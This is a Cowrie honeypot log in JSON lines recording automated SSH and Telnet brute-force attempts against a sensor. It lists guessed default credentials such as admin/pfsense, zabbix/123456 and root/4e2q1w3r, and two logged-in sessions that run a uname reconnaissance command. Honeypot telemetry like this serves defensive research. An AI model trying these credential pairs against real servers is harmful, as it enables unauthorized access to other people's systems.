{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60430,"dst_ip":"1.2.3.4","dst_port":22,"session":"55fc9d568188","protocol":"ssh","message":"New connection: 212.227.235.229:60430 (1.2.3.4:22) [session: 55fc9d568188]","sensor":"my-vps","timestamp":"2025-08-28T06:46:48.626472Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:46:48.627483Z","src_ip":"212.227.235.229","session":"55fc9d568188"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:46:48.876603Z","src_ip":"212.227.235.229","session":"55fc9d568188"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:49.624535Z","src_ip":"212.227.235.229","session":"55fc9d568188"}
{"eventid":"cowrie.session.closed","duration":31.237613916397095,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:46:50.590004Z","src_ip":"8.222.212.69","session":"a4e5240a9272"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:46:50.873472Z","src_ip":"212.227.235.229","session":"55fc9d568188"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":49083,"dst_ip":"1.2.3.4","dst_port":22,"session":"190f6eb0d681","protocol":"ssh","message":"New connection: 80.94.95.15:49083 (1.2.3.4:22) [session: 190f6eb0d681]","sensor":"my-vps","timestamp":"2025-08-28T06:46:55.738024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:46:55.738975Z","src_ip":"80.94.95.15","session":"190f6eb0d681"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:46:55.804184Z","src_ip":"80.94.95.15","session":"190f6eb0d681"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pfsense","message":"login attempt [admin/pfsense] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:56.094878Z","src_ip":"80.94.95.15","session":"190f6eb0d681"}
{"eventid":"cowrie.login.failed","username":"admin","password":"4dm1n","message":"login attempt [admin/4dm1n] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:57.149179Z","src_ip":"80.94.95.15","session":"190f6eb0d681"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Aa123456","message":"login attempt [admin/Aa123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:58.205419Z","src_ip":"80.94.95.15","session":"190f6eb0d681"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45450,"dst_ip":"1.2.3.4","dst_port":22,"session":"dea6a289455e","protocol":"ssh","message":"New connection: 212.227.125.160:45450 (1.2.3.4:22) [session: dea6a289455e]","sensor":"my-vps","timestamp":"2025-08-28T06:46:58.597373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:46:58.598410Z","src_ip":"212.227.125.160","session":"dea6a289455e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:46:58.825963Z","src_ip":"212.227.125.160","session":"dea6a289455e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Password@123","message":"login attempt [admin/Password@123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:59.258129Z","src_ip":"80.94.95.15","session":"190f6eb0d681"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:46:59.513142Z","src_ip":"212.227.125.160","session":"dea6a289455e"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234567890","message":"login attempt [admin/1234567890] failed","sensor":"my-vps","timestamp":"2025-08-28T06:47:00.314940Z","src_ip":"80.94.95.15","session":"190f6eb0d681"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:00.742119Z","src_ip":"212.227.125.160","session":"dea6a289455e"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:01.368168Z","src_ip":"80.94.95.15","session":"190f6eb0d681"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38680,"dst_ip":"1.2.3.4","dst_port":22,"session":"1117aaf37ca2","protocol":"ssh","message":"New connection: 212.227.235.229:38680 (1.2.3.4:22) [session: 1117aaf37ca2]","sensor":"my-vps","timestamp":"2025-08-28T06:47:05.969759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:47:05.970760Z","src_ip":"212.227.235.229","session":"1117aaf37ca2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:47:06.231547Z","src_ip":"212.227.235.229","session":"1117aaf37ca2"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"123456","message":"login attempt [zabbix/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:47:07.014521Z","src_ip":"212.227.235.229","session":"1117aaf37ca2"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:08.277971Z","src_ip":"212.227.235.229","session":"1117aaf37ca2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41280,"dst_ip":"1.2.3.4","dst_port":22,"session":"0043a102268d","protocol":"ssh","message":"New connection: 212.227.125.160:41280 (1.2.3.4:22) [session: 0043a102268d]","sensor":"my-vps","timestamp":"2025-08-28T06:47:15.718820Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:47:15.745088Z","src_ip":"212.227.125.160","session":"0043a102268d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:47:15.946463Z","src_ip":"212.227.125.160","session":"0043a102268d"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:47:16.856215Z","src_ip":"212.227.125.160","session":"0043a102268d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:47:17.405806Z","src_ip":"212.227.125.160","session":"0043a102268d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:47:17.406514Z","src_ip":"212.227.125.160","session":"0043a102268d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:17.634990Z","src_ip":"212.227.125.160","session":"0043a102268d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:17.636078Z","src_ip":"212.227.125.160","session":"0043a102268d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52134,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d99d566d6db","protocol":"ssh","message":"New connection: 212.227.235.229:52134 (1.2.3.4:22) [session: 8d99d566d6db]","sensor":"my-vps","timestamp":"2025-08-28T06:47:22.234262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:47:22.234938Z","src_ip":"212.227.235.229","session":"8d99d566d6db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:47:22.485002Z","src_ip":"212.227.235.229","session":"8d99d566d6db"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:47:23.235999Z","src_ip":"212.227.235.229","session":"8d99d566d6db"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:47:23.757613Z","src_ip":"212.227.235.229","session":"8d99d566d6db"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:47:23.758322Z","src_ip":"212.227.235.229","session":"8d99d566d6db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:24.009002Z","src_ip":"212.227.235.229","session":"8d99d566d6db"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:24.010097Z","src_ip":"212.227.235.229","session":"8d99d566d6db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49938,"dst_ip":"1.2.3.4","dst_port":22,"session":"c41a959c62a0","protocol":"ssh","message":"New connection: 212.227.125.160:49938 (1.2.3.4:22) [session: c41a959c62a0]","sensor":"my-vps","timestamp":"2025-08-28T06:47:32.087950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:47:32.096215Z","src_ip":"212.227.125.160","session":"c41a959c62a0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:47:32.303600Z","src_ip":"212.227.125.160","session":"c41a959c62a0"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:47:33.160747Z","src_ip":"212.227.125.160","session":"c41a959c62a0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:34.378121Z","src_ip":"212.227.125.160","session":"c41a959c62a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42336,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a388ad40dc3","protocol":"ssh","message":"New connection: 212.227.235.229:42336 (1.2.3.4:22) [session: 3a388ad40dc3]","sensor":"my-vps","timestamp":"2025-08-28T06:47:38.730292Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:47:38.732001Z","src_ip":"212.227.235.229","session":"3a388ad40dc3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:47:38.981474Z","src_ip":"212.227.235.229","session":"3a388ad40dc3"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:47:39.981544Z","src_ip":"212.227.235.229","session":"3a388ad40dc3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:47:41.234537Z","src_ip":"212.227.235.229","session":"3a388ad40dc3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49698,"dst_ip":"1.2.3.4","dst_port":23,"session":"af9ad27d697e","protocol":"telnet","message":"New connection: 212.227.125.160:49698 (1.2.3.4:23) [session: af9ad27d697e]","sensor":"my-vps","timestamp":"2025-08-28T06:47:43.757454Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58844,"dst_ip":"1.2.3.4","dst_port":22,"session":"0eeb598246be","protocol":"ssh","message":"New connection: 212.227.125.160:58844 (1.2.3.4:22) [session: 0eeb598246be]","sensor":"my-vps","timestamp":"2025-08-28T06:47:48.612814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:47:48.613635Z","src_ip":"212.227.125.160","session":"0eeb598246be"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:47:48.833959Z","src_ip":"212.227.125.160","session":"0eeb598246be"}
